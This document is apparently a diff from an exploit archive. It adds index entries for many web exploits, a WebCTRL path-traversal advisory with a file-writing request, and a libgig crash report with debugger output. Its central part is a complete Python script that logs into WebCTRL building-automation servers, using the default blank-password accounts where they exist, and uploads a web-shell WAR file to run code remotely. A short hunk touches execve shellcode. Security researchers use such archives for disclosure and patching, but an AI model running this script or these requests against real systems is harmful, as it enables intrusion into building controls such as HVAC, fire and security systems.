 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
 42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38259,6 +38263,7 @@ id,file,description,date,author,platform,type,port
 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
 42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0
 42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0
 42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0
 42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0
@ -38314,7 +38319,15 @@ id,file,description,date,author,platform,type,port
 42501,platforms/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0
 42505,platforms/php/webapps/42505.txt,"iTech B2B Script 4.42 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0
 42506,platforms/php/webapps/42506.txt,"iTech Business Networking Script 8.26 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42507,platforms/php/webapps/42507.txt,"iTech Caregiver Script 2.71 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42508,platforms/php/webapps/42508.txt,"iTech Classifieds Script 7.41 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42509,platforms/php/webapps/42509.txt,"iTech Image Sharing Script 4.13 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42510,platforms/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42511,platforms/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
--- a/platforms/java/webapps/42543.txt
+++ b/platforms/java/webapps/42543.txt
@ -0,0 +1,64 @@
 Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write
 Vendor: Automated Logic Corporation
 Product web page: http://www.automatedlogic.com
 Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
                  ALC WebCTRL, i-Vu 6.0 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
 Summary: WebCTRL®, Automated Logic's web-based building automation
 system, is known for its intuitive user interface and powerful integration
 capabilities. It allows building operators to optimize and manage
 all of their building systems - including HVAC, lighting, fire, elevators,
 and security - all within a single HVAC controls platform. It's everything
 they need to keep occupants comfortable, manage energy conservation measures,
 identify key operational problems, and validate the results.
 Desc: The vulnerability is triggered by an authenticated user that can use
 the manualcommand console in the management panel of the affected application.
 The ManualCommand() function in ManualCommand.js allows users to perform additional
 diagnostics and settings overview by using pre-defined set of commands. This
 can be exploited by using the echo command to write and/or overwrite arbitrary
 files on the system including directory traversal throughout the system.
 Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.42
           CJServer/1.1
           Java/1.7.0_25-b17
           Java HotSpot Server VM 23.25-b01
           Ant 1.7.0
           Axis 1.4
           Trove 2.0.2
           Xalan Java 2.4.1
           Xerces-J 2.6.1
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5430
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php
 CVE ID: CVE-2017-9640
 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640
 30.01.2017
 --
 PoC:
 GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
 Host: TARGET
 ---
 GET http://TARGET/touch.txt HTTP/1.1
 peend
--- a/platforms/java/webapps/42544.py
+++ b/platforms/java/webapps/42544.py
@ -0,0 +1,231 @@
 #!/usr/bin/env python
 # -*- coding: utf8 -*-
 #
 #
 # Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
 #
 #
 # Vendor: Automated Logic Corporation
 # Product web page: http://www.automatedlogic.com
 # Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
 #                   ALC WebCTRL, SiteScan Web 6.1 and prior
 #                   ALC WebCTRL, i-Vu 6.0 and prior
 #                   ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
 #                   ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
 #
 # Summary: WebCTRL®, Automated Logic's web-based building automation
 # system, is known for its intuitive user interface and powerful integration
 # capabilities. It allows building operators to optimize and manage
 # all of their building systems - including HVAC, lighting, fire, elevators,
 # and security - all within a single HVAC controls platform. It's everything
 # they need to keep occupants comfortable, manage energy conservation measures,
 # identify key operational problems, and validate the results.
 #
 # Desc: WebCTRL suffers from an authenticated arbitrary code execution
 # vulnerability. The issue is caused due to the improper verification
 # when uploading Add-on (.addons or .war) files using the uploadwarfile
 # servlet. This can be exploited to execute arbitrary code by uploading
 # a malicious web archive file that will run automatically and can be
 # accessed from within the webroot directory. Additionaly, an improper
 # authorization access control occurs when using the 'anonymous' user.
 # By specification, the anonymous user should not have permissions or
 # authorization to upload or install add-ons. In this case, when using
 # the anonymous user, an attacker is still able to upload a malicious
 # file via insecure direct object reference and execute arbitrary code.
 # The anonymous user was removed from version 6.5 of WebCTRL.
 #
 # Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
 #            Apache-Coyote/1.1
 #            Apache Tomcat/7.0.42
 #            CJServer/1.1
 #            Java/1.7.0_25-b17
 #            Java HotSpot Server VM 23.25-b01
 #            Ant 1.7.0
 #            Axis 1.4
 #            Trove 2.0.2
 #            Xalan Java 2.4.1
 #            Xerces-J 2.6.1
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2017-5431
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php
 #
 # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
 # CVE ID: CVE-2017-9650
 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650
 #
 #
 # 30.01.2017
 #
 #
 import itertools
 import mimetools
 import mimetypes
 import cookielib
 import binascii
 import urllib2
 import urllib
 import sys
 import re
 import os
 from urllib2 import URLError
 global bindata
 __author__ = 'lqwrm'
 piton = os.path.basename(sys.argv[0])
 def bannerche():
  print '''
 @-------------------------------------------------@
 |                                                 |
 |        WebCTRL 6.5 Authenticated RCE PoC        |
 |               ID: ZSL-2017-5431                 |
 |       Copyleft (c) 2017, Zero Science Lab       |
 |                                                 |
 @-------------------------------------------------@
          '''
  if len(sys.argv) < 3:
    print '[+] Usage: '+piton+' <IP> <WAR FILE>'
    print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n'
    sys.exit()
 bannerche()
 host = sys.argv[1]
 filename = sys.argv[2]
 with open(filename, 'rb') as f:
    content = f.read()
 hexo = binascii.hexlify(content)
 bindata = binascii.unhexlify(hexo)
 cj = cookielib.CookieJar()
 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
 urllib2.install_opener(opener)
 print '[+] Probing target http://'+host
 try:
  checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')
 except urllib2.HTTPError, errorzio:
  if errorzio.code == 404:
    print '[!] Error 001:'
    print '[-] Check your target!'
    print
    sys.exit()
 except URLError, errorziocvaj:
  if errorziocvaj.reason:
    print '[!] Error 002:'
    print '[-] Check your target!'
    print
    sys.exit()
 print '[+] Target seems OK.'
 print '[+] Login please:'
 print '''
 Default username: Administrator, Anonymous
 Default password: (blank), (blank)
 '''
 username = raw_input('[*] Enter username: ')
 password = raw_input('[*] Enter password: ')
 login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})
 opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
 login = opener.open('http://'+host+'/?language=en', login_data)
 auth = login.read()
 if re.search(r'productName = \'WebCTRL', auth):
  print '[+] Authenticated!'
  token = re.search('wbs=(.+?)&', auth).group(1)
  print '[+] Got wbs token: '+token
  cookie1, cookie2 = [str(c) for c in cj]
  cookie = cookie1[8:51]
  print '[+] Got cookie: '+cookie
 else:
  print '[-] Incorrect username or password.'
  print
  sys.exit()
 print '[+] Sending payload.'
 class MultiPartForm(object):
    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary
    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
    def __str__(self):
        parts = []
        part_boundary = '--' + self.boundary
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)
 if __name__ == '__main__':
    form = MultiPartForm()
    form.add_field('wbs', token)
    form.add_field('file"; filename="'+filename, bindata)
    request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
    request.add_header('User-agent', 'SCADA/8.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
 print '[+] Payload uploaded.'
 print '[+] Shell available at: http://'+host+'/'+filename[:-4]
 print
 sys.exit()
--- a/platforms/lin_x86/shellcode/13370.c
+++ b/platforms/lin_x86/shellcode/13370.c
@ -1,3 +1,4 @@
 /*
 * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes
 *
--- a/platforms/linux/dos/42546.txt
+++ b/platforms/linux/dos/42546.txt
@ -0,0 +1,587 @@
 ================
 Author : qflb.wu
 ===============
 Introduction:
 =============
 https://www.linuxsampler.org/libgig/
 libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data. 
 Affected version:
 =====
 4.0.0
 Vulnerability Description:
 ==========================
 1.
 the gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
 ./gigdump libgig_4.0.0_null_pointer_dereference_1.gig
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
    pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
 2970                    if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
 (gdb) bt
 #0  0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
    pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
 #1  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
    pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
    at gig.cpp:4404
 #2  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
 #3  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
 #4  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
 #5  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
 (gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
 Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
   0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>:je     0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
   0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>:xor    %edx,%edx
   0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>:mov    %eax,%esi
   0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>:mov    %rbx,%rdi
   0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>:mov    0x138(%r13),%r14
   0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>:callq  0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
 => 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>:mov    %rax,0x38(%r14)
   0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>:add    $0x1,%ebp
   0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>:add    $0x8,%r13
   0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>:cmp    %ebp,0x130(%rbx)
 End of assembler dump.
 (gdb) i r
 rax            0x60ca906343312
 rbx            0x614ce06376672
 rcx            0x33
 rdx            0x60a3006333184
 rsi            0x00
 rdi            0x6091606328672
 rbp            0x00x0
 rsp            0x7fffffffdcc00x7fffffffdcc0
 r8             0x00
 r9             0x22
 r10            0x00
 r11            0x246582
 r12            0x6159506379856
 r13            0x614ce06376672
 r14            0x00
 r15            0x00
 rip            0x7ffff7bc07df0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
 eflags         0x10246[ PF ZF IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 ---Type <return> to continue, or q <return> to quit---
 fs             0x00
 gs             0x00
 (gdb) 
 ASAN:SIGSEGV
 =================================================================
 ==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
 AddressSanitizer can not provide additional info.
    #0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
 SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
 ==40516== ABORTING
 POC:
 libgig_4.0.0_null_pointer_dereference_1.gig
 CVE:
 CVE-2017-12950
 2.
 the gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(stack buffer overflow and application crash) via a crafted gig file.
 ./gigdump libgig_4.0.0_stack_buffer_overflow.gig
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2884
 2884        table[0] = 0;
 (gdb) bt
 #0  0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2884
 #1  0x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2054
 #2  0x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
    this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>, 
    vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>, 
    vcfCutoffController=<optimized out>) at gig.cpp:2042
 #3  0x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
    this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
    at gig.cpp:1617
 #4  0x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
    this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
 #5  0x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0, 
    pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
 #6  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280, 
    pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
    at gig.cpp:4404
 #7  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
 #8  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
 ---Type <return> to continue, or q <return> to quit---
    this=this@entry=0x609160) at gig.cpp:5378
 #9  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
 #10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
    (gdb) disassemble
 Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
 ...
   0x00007ffff7bb8b27 <+2119>:mov    0x2e0(%rsp,%rdx,8),%rsi
   0x00007ffff7bb8b2f <+2127>:je     0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
   0x00007ffff7bb8b35 <+2133>:movzbl %bpl,%ebx
   0x00007ffff7bb8b39 <+2137>:cvtsi2sd %ebx,%xmm6
   0x00007ffff7bb8b3d <+2141>:movq   $0x0,(%rax)
 => 0x00007ffff7bb8b44 <+2148>:mov    0x8(%rsi),%edi
   0x00007ffff7bb8b47 <+2151>:lea    0x8(%rax),%rcx
 ---Type <return> to continue, or q <return> to quit---
   0x00007ffff7bb8b4b <+2155>:mov    0xc(%rsi),%r10d
   0x00007ffff7bb8b4f <+2159>:mov    $0x1,%edx
 ...
 (gdb) i r
 rax            0x60e0506348880
 rbx            0x1420
 rcx            0x7ffff7669760140737344083808
 rdx            0xfe254
 rsi            0x2f736c6f6f742f633419195767971393379
 rdi            0x22
 rbp            0x00x0
 rsp            0x7fffffffd8600x7fffffffd860
 r8             0x60dbc06347712
 r9             0x4064
 r10            0x7fffffffd9f0140737488345584
 r11            0x7ffff7bbf601140737349678593
 r12            0x44
 r13            0x60d7706346608
 r14            0x60c3a06341536
 r15            0x60c3a06341536
 rip            0x7ffff7bb8b440x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
 eflags         0x10246[ PF ZF IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 ---Type <return> to continue, or q <return> to quit---
 fs             0x00
 gs             0x00
 (gdb) x/20x $rsi+0x8
 0x2f736c6f6f742f6b:Cannot access memory at address 0x2f736c6f6f742f6b
 (gdb) 
 0x2f736c6f6f742f6f:Cannot access memory at address 0x2f736c6f6f742f6f
 (gdb)
 ==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
 READ of size 8 at 0x7ffc9ca05fa0 thread T0
    #0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
    #1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
    #2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
    #3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
    #4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
    #5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
 Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
  This frame has 2 object(s):
    [32, 40) 'name'
    [96, 104) 'name'
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
 Shadow bytes around the buggy address:
  0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
  0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
 =>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
  0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
  0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
 ==40504== ABORTING
 POC:
 libgig_4.0.0_stack_buffer_overflow.gig
 CVE:
 CVE-2017-12951
 3.
 the LoadString function in helper.h in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
 ./gigdump libgig_4.0.0_null_pointer_dereference_2.gig
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 LoadString (s="", ck=0x6095d0) at helper.h:148
 148            if (str[len] == '\0') break;
 (gdb) bt
 #0  LoadString (s="", ck=0x6095d0) at helper.h:148
 #1  DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865, 
    lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
 #2  0x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
    at DLS.cpp:263
 #3  0x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160, 
    Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
    at DLS.cpp:448
 #4  0x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
    at DLS.cpp:1435
 #5  0x00007ffff7bbab2e in gig::File::File (this=0x609160, 
    pRIFF=<optimized out>) at gig.cpp:5201
 #6  0x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:70
 (gdb) disassemble 
 Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
   0x00007ffff7ba7f30 <+0>:push   %rbp
   0x00007ffff7ba7f31 <+1>:mov    %edi,%eax
   0x00007ffff7ba7f33 <+3>:mov    %rsi,%rdi
   0x00007ffff7ba7f36 <+6>:mov    %eax,%esi
   0x00007ffff7ba7f38 <+8>:push   %rbx
   0x00007ffff7ba7f39 <+9>:mov    %rdx,%rbx
   0x00007ffff7ba7f3c <+12>:sub    $0x8,%rsp
   0x00007ffff7ba7f40 <+16>:callq  0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
   0x00007ffff7ba7f45 <+21>:test   %rax,%rax
   0x00007ffff7ba7f48 <+24>:mov    %rax,%rbp
   0x00007ffff7ba7f4b <+27>:je     0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
   0x00007ffff7ba7f4d <+29>:mov    %rax,%rdi
   0x00007ffff7ba7f50 <+32>:callq  0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
   0x00007ffff7ba7f55 <+37>:mov    0xc(%rbp),%r10d
   0x00007ffff7ba7f59 <+41>:mov    %rax,%rsi
   0x00007ffff7ba7f5c <+44>:test   %r10d,%r10d
   0x00007ffff7ba7f5f <+47>:jle    0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
 ---Type <return> to continue, or q <return> to quit---
